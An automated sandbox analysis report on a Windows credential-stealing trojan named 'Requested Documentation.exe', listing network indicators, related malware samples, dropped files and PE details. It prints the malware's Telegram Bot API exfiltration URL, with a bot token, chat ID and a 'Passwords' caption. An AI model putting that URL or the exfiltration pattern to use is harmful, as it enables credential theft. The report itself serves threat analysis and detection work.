checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582315
Start date and time: 2024-12-30 10:56:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Requested Documentation.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 58
                                                        • Number of non-executed functions: 271
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:57:09 | API Interceptor | 10586606x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | iviewers.dll | Get hash | malicious | LummaC | Browse |
149.154.167.220 | Flasher.exe | Get hash | malicious | Luca Stealer, Rusty Stealer | Browse |
149.154.167.220 | i8Vwc7iOaG.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar | Browse |
149.154.167.220 | INQUIRY.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
149.154.167.220 | cMTqzvmx9u.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, RedLine | Browse |
149.154.167.220 | Technonomic.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | Proforma Invoice.exe | Get hash | malicious | MassLogger RAT | Browse |
149.154.167.220 | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | tg.exe | Get hash | malicious | Babadeda | Browse |
149.154.167.220 | tg.exe | Get hash | malicious | Babadeda | Browse |
188.114.96.3 | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/u7ghXEYp/download
188.114.96.3 | CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse | www.mffnow.info/1a34/
188.114.96.3 | A2028041200SD.exe | Get hash | malicious | FormBook | Browse | www.mydreamdeal.click/1ag2/
188.114.96.3 | SWIFT COPY 0028_pdf.exe | Get hash | malicious | FormBook | Browse | www.questmatch.pro/ipd6/
188.114.96.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/I7fmQg9d/download
188.114.96.3 | need quotations.exe | Get hash | malicious | FormBook | Browse | www.rtpwslot888gol.sbs/jmkz/
188.114.96.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/Bh1Kj4RD/download
188.114.96.3 | http://kklk16.bsyo45ksda.top | Get hash | malicious | Unknown | Browse | kklk16.bsyo45ksda.top/favicon.ico
188.114.96.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/XrlEIxYp/download
188.114.96.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/XrlEIxYp/download
132.226.247.73 | Dotc67890990.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | Invoice DHL - AWB 2024 E4001 - 0000731.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | PURCHASE ORDER TRC-090971819130-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | D.G Governor Istek,Docx.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | 0001.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | ugpJX5h56S.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | hesaphareketi-01.pdf.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | Shipment 990847575203.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | DEC 2024 RFQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | Dotc67890990.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | INQUIRY.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 172.67.177.134
reallyfreegeoip.org | Technonomic.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 172.67.177.134
reallyfreegeoip.org | HALKBANK EKSTRE.exe | Get hash | malicious | MassLogger RAT | Browse | 172.67.177.134
reallyfreegeoip.org | EPIRTURMEROOO0060.exe | Get hash | malicious | MassLogger RAT | Browse | 172.67.177.134
reallyfreegeoip.org | Proforma Invoice.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.67.152
reallyfreegeoip.org | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | HUBED342024.exe | Get hash | malicious | MassLogger RAT | Browse | 172.67.177.134
reallyfreegeoip.org | PARATRANSFARI REMINDER.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | MT Eagle Asia 11.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
checkip.dyndns.com | ZOYGRL1ePa.exe | Get hash | malicious | Agent Tesla, AgentTesla | Browse | 158.101.44.242
checkip.dyndns.com | Dotc67890990.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | INQUIRY.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 193.122.6.168
checkip.dyndns.com | Technonomic.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | HALKBANK EKSTRE.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | EPIRTURMEROOO0060.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | Proforma Invoice.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | HUBED342024.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | PARATRANSFARI REMINDER.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
api.telegram.org | iviewers.dll | Get hash | malicious | LummaC | Browse | 149.154.167.220
api.telegram.org | Flasher.exe | Get hash | malicious | Luca Stealer, Rusty Stealer | Browse | 149.154.167.220
api.telegram.org | INQUIRY.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 149.154.167.220
api.telegram.org | Technonomic.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | Proforma Invoice.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | tg.exe | Get hash | malicious | Babadeda | Browse | 149.154.167.220
api.telegram.org | tg.exe | Get hash | malicious | Babadeda | Browse | 149.154.167.220
api.telegram.org | setup.exe | Get hash | malicious | Babadeda | Browse | 149.154.167.220
api.telegram.org | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | Tool_Unlock_v1.2.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | iviewers.dll | Get hash | malicious | LummaC | Browse | 149.154.167.220
TELEGRAMRU | Flasher.exe | Get hash | malicious | Luca Stealer, Rusty Stealer | Browse | 149.154.167.220
TELEGRAMRU | JA7cOAGHym.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | https://linkenbio.net/59125/247 | Get hash | malicious | Unknown | Browse | 149.154.167.99
TELEGRAMRU | aD7D9fkpII.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | installer.bat | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | skript.bat | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | din.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | yoda.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
CLOUDFLARENETUS | 6QLvb9i.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
CLOUDFLARENETUS | http://i646972656374o6c6373o636f6dz.oszar.com/ | Get hash | malicious | Unknown | Browse | 104.16.79.73
CLOUDFLARENETUS | securedoc_20241220T111852.html | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | https://visa-pwr.com/ | Get hash | malicious | Unknown | Browse | 104.18.28.104
CLOUDFLARENETUS | lumma.ps1 | Get hash | malicious | LummaC | Browse | 104.21.72.190
CLOUDFLARENETUS | vlid_acid.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.190.223
CLOUDFLARENETUS | sysmonconfig.xml | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | Get hash | malicious | Unknown | Browse | 172.67.134.110
CLOUDFLARENETUS | https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6a | Get hash | malicious | Unknown | Browse | 104.18.1.101
UTMEMUS | Dotc67890990.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
UTMEMUS | PARATRANSFARI REMINDER.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
UTMEMUS | Invoice DHL - AWB 2024 E4001 - 0000731.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | PURCHASE ORDER TRC-090971819130-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 132.226.247.73
UTMEMUS | F.O Pump Istek,Docx.bat | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 132.226.8.169
UTMEMUS | D.G Governor Istek,Docx.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | 0001.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
UTMEMUS | sparc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 132.240.253.211
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | Dotc67890990.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | INQUIRY.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Technonomic.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | HALKBANK EKSTRE.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | EPIRTURMEROOO0060.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Proforma Invoice.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Azygoses125.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | HUBED342024.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | PARATRANSFARI REMINDER.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | MT Eagle Asia 11.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e | lumma.ps1 | Get hash | malicious | LummaC | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | GPU-Z.exe | Get hash | malicious | LummaC, DarkTortilla, LummaC Stealer | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Winter.mp4.hta | Get hash | malicious | LummaC | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | aYu936prD4.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | aYu936prD4.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | VegaStealer_v2.exe | Get hash | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SharcHack.exe | Get hash | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | l0zocrLiVW.exe | Get hash | malicious | LummaC | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | FLKCAS1DzH.bat | Get hash | malicious | Unknown | Browse | 149.154.167.220
                                                                            No context
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:ASCII text, with very long lines (28674), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):28674
                                                                            Entropy (8bit):3.576516521383417
                                                                            Encrypted:false
                                                                            SSDEEP:768:G3i/5IPbFVvkb7Ogotwp5JF6xVLmql1ffnu1uLphM:UiBIPb7o7OZ2uLDM
                                                                            MD5:9A59BBDD886F68C7BE07A029ED4D3E80
                                                                            SHA1:1BE16BF41496F0DA17429EAF7D29B4868AAB5322
                                                                            SHA-256:E003FCAB09F68F411C333E06368E3108738248D939BBE508A3B16606462AC3FC
                                                                            SHA-512:85C679487ABD4E79AC76872260E267BAE4C04F392E7EBE43835C493E3EDAD7D3B8C0914BF0A2D9D505AAB1A2B0ADD3D45CE990AAE81388A3054501665CEFC37A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):202438
                                                                            Entropy (8bit):7.986069339726158
                                                                            Encrypted:false
                                                                            SSDEEP:6144:o7siyfGmEvnb98JhcjvTQVTAHI8yAKgO2S:oIiSGXvbmPcnY0HI/AKB
                                                                            MD5:745A16F13262FAA0919D175F5023126E
                                                                            SHA1:B45F441BBC4ED36A01CD137EA44DFE7FD34495B5
                                                                            SHA-256:5DA9E93F7C8B868A62DFB54D5C4D1C8BB76081A16F2035BB8883EF9F28A71F25
                                                                            SHA-512:8D132D1EED596363202CBFE6018A9E5E775C233B271D07344039379065D83AFE0140C429AAC709F4A8C460CD26191BE84842811569B40AE04563E2C7CC009E59
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):9642
                                                                            Entropy (8bit):7.605185944277541
                                                                            Encrypted:false
                                                                            SSDEEP:192:c09SJLZ7jNO7shMZLo2rfGUBd1fbLeZxMGSbpk5jHIdy41oZ/Fboa6VNyAtStJMS:X9SJtjMM2Tl1fOcIhHIcdJ6VY3MivYLi
                                                                            MD5:EBEC6F71418CD94F4B2AC503AAEA600D
                                                                            SHA1:11CC89821DCC70A4ED40248F35C2E93CC31FE0CE
                                                                            SHA-256:62169D919AFC3F4FB472B462823F974029BBBF31E120F6D0A6BD62535826E59B
                                                                            SHA-512:F0830799D605354D05D92E381B9AC07DEB31B0EA3C9F506706877D8394E82B631C3C5A03C4C15ED19A860ED46CF3F71E421C882FC829476C5591A7A5B309AB6A
                                                                            Malicious:false
                                                                            Reputation:low
Process:C:\Users\user\Desktop\Requested Documentation.exe
File Type:data
Category:dropped
Size (bytes):209408
Entropy (8bit):7.835973097555397
Encrypted:false
SSDEEP:6144:Y5pZIM9aQEkzOO1VOWiZYbxsTPl1L6KUGUXHD/:6IWaR8n1VO2b4PP+K6HD/
MD5:F3198D88969F91AAE1424785247EBB9B
SHA1:902195B32F662BC3F2370C3B1748DA8FDF850C2B
SHA-256:56122AD9D4E3C93866C48FBBB7E231596336F203EE0F85BAFDE235E88D2A69C7
SHA-512:37E623AABC26B2BA131CF6A56029BF44C228958E508850EDD9A831AD4AB0BED3B06A4F0CDAB31D5515A02248FC99337C296FF3FA4EDCB81DE752D2015A714BE6
Malicious:false
Reputation:low
                                                                            Preview:.l.C[5XIMMP6.0G.ZH6NCX5.IIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5.IIM^).D0.H.i.O....! >pFJ%W5 7hU/-6Z,i+(pDM$../z.y.c5Z<,g@]<.J0GAZH6&S..t8.3|G.4.6.$z.1=gD.7B..H.;.9m+.H.2.Kjj'3LG.4.d($.G.=j.#7d<.Hj#S/m+.HNCX5XIIMP68J0GAZ..;.X5XI..P6tK4G5.HfNCX5XIIM.6.K;FHZH.OCX.YIIMP6..0GAJH6N.Y5XI.MP&8J0EAZM6NCX5XILMP68J0GA.K6NGX5.rKMR68.0GQZH&NCX5HII]P68J0GQZH6NCX5XIIM.#:J`GAZHVLC.$YIIMP68J0GAZH6NCX5XIIMP68J..@ZT6NCX5XIIMP68J0GAZH6NCX5XIIM.;:JpGAZH6NCX5XII.Q6.K0GAZH6NCX5XIIMP68J0GAZH6NCvA=1=MP6 .1GAJH6N.Y5XMIMP68J0GAZH6NCx5X)g?4WL+0G.7H6N.Y5X'IMP.9J0GAZH6NCX5XI.MPv..Q3 ZH6.sX5XiKMP 8J0MCZH6NCX5XIIMP6xJ0.o(;D-CX5.XHMPV:J0U@ZH.LCX5XIIMP68J0G.ZHvNCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIM
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.048139892373215
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Requested Documentation.exe
File size:1'090'048 bytes
MD5:7ccc5d635cbd8627f4f2aac3e54248d0
SHA1:cc315dfc181424321b7e82bb19bab2d949346aa3
SHA256:bbe22c9c5c417bd5f92f310e994ed7b0ea3323feabc7d16eb14d25b84059d38d
SHA512:85cf0e71d96265a838ae581e8dc08cfe078305dcd3bc2b660d51d1ace657b46432cc0a7066c03e2c6183505506fdfc105bc4846f7d960555f5ca99f9b0b57d87
SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6FaHFJolYKA9pWY:Au0c++OCvkGs9FaHfolYKAuY
TLSH:0D35BE2273DDC370CB669173BF6AB7016EBF7C610630B85B2F980D79A950162162D7A3
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash:aaf3e3e3938382a0
Entrypoint:0x427dcd
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x6771E02A [Sun Dec 29 23:50:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007FF940C32CFAh
jmp 00007FF940C25AC4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FF940C25C4Ah
cmp edi, eax
jc 00007FF940C25FAEh
bt dword ptr [004C31FCh], 01h
jnc 00007FF940C25C49h
rep movsb
jmp 00007FF940C25F5Ch
cmp ecx, 00000080h
jc 00007FF940C25E14h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FF940C25C50h
bt dword ptr [004BE324h], 01h
jc 00007FF940C26120h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FF940C25DEDh
test edi, 00000003h
jne 00007FF940C25DFEh
test esi, 00000003h
jne 00007FF940C25DDDh
bt edi, 02h
jnc 00007FF940C25C4Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FF940C25C53h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FF940C25CA5h
bt esi, 03h
jnc 00007FF940C25CF8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x418a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x109000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x418a0 | 0x41a00 | 2a7833176020de2fcf5cabf5d55a8d8a | False | 0.8993340773809524 | data | 7.828299040259301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x109000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
